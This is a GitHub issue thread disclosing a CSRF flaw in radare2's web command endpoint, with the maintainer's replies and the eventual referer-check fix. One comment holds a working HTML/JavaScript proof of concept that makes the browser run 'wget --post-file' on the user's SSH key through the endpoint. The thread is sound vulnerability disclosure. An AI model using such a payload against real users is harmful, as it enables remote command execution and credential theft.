### ISSUE TITLE
The /cmd/ endpoint in the web interface is not protected againts CSRF

### ISSUE THREAD

**Issue by atalax** [radare/radare2#4336]
The `/cmd/` endpoint is not protected againts CSRF. This allows any site visited while the web server is running to execute arbitrary commands on the host.

**Comment by radare** [comment]
e http.cors=true

**Comment by atalax** [comment]
I might be doing this wrong, but setting `e http.cors = true` does not really help
Try this for example:
```
<html>
<body>
<script>
var x = new XMLHttpRequest();
x.open("GET", "http://localhost:9090/cmd/!wget%20--post-file%20/home/atx/.ssh/id_rsa.pub%20localhost:8888", true);
x.send();
</script>
</body>
</html>
```
Digging through the code, it looks like the `Origin:` header should be checked somewhere around [here](https://github.com/radare/radare2/blob/master/libr/core/rtr.c#L592), but as I don't know the codebase, I am not really sure if that is enough.

**Comment by radare** [comment]
Ah, i missunderstood you. if you dont want others to run commands in this radare session just load it in sandbox mode. `e cfg.sandbox=true`

**Comment by atalax** [comment]
Hm, thanks, I will be sure to add that to my .radare2rc from now on (note that the correct option is actually `http.sandbox = true`, `cfg.sandbox` disables the web server entirely).

Why is this not the default? I do not think leaving a wide open hole to the host system by default is a good idea...

**Comment by radare** [comment]
> On 18 Mar 2016, at 11:17, Josef Gajdusek <notifications@github.com> wrote:
> 
> Hm, thanks, I will be sure to add that to my .radare2rc from now on (note that the correct option is actually http.sandbox = true, cfg.sandbox disables the web server entirely).
> 
you have to run cfg.sandbox right after starting the webserver,

> Why is this not the default? I do not think leaving a wide open hole to the host system by default is a good idea...
> 
> 


By default http.bind = localhost, so that port shouldnt be open for everyone. if having ports open for localhost is a problem for you you should run r2 in docker maybe or just enable the sandbox when you want others to participate there.

Also, even if you disable ! there are many other ways to run code in r2, this is why the sandbox mode exists, it disables filesystem access, network sockets and external command execution. If you find a way to bypass the sandbox without exploiting any overflow let me know :)

we try to fuzz as much as possible and fix the crashes as soon as possible, also, im trying to reduce the number of plugins loaded by default which may reduce the bugs too.

if you are really paranoid there are sandboxing profiles for seatbelt, selinux, .. for r2 already available

**Comment by atalax** [comment]
> you have to run cfg.sandbox right after starting the webserver

That seems to  [happen](https://github.com/radare/radare2/blob/master/libr/core/rtr.c#L449) automatically.

> By default http.bind = localhost, so that port shouldnt be open for everyone. if having ports open for localhost is a problem for you you should run r2 in docker maybe or just enable the sandbox when you want others to participate there.

That does not really help anything though does it? The way [CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery#Example_and_characteristics) works is as follows:

1) I start radare2 HTTP server on my machine
2) I visit an attacker controlled website
3) Attacker controlled website makes a request to `localhost:9090/cmd/doevil`, for example, through the AJAX code I posted, through a form, through an `<img src=...>` tag, whatever

Point is, the request comes from the local machine, so binding to localhost does not avoid CSRF attacks.

**Comment by radare** [comment]
It's fixed in master by just enabling `e http.referer=true` you can even specify a different referer if the string contains `://`.
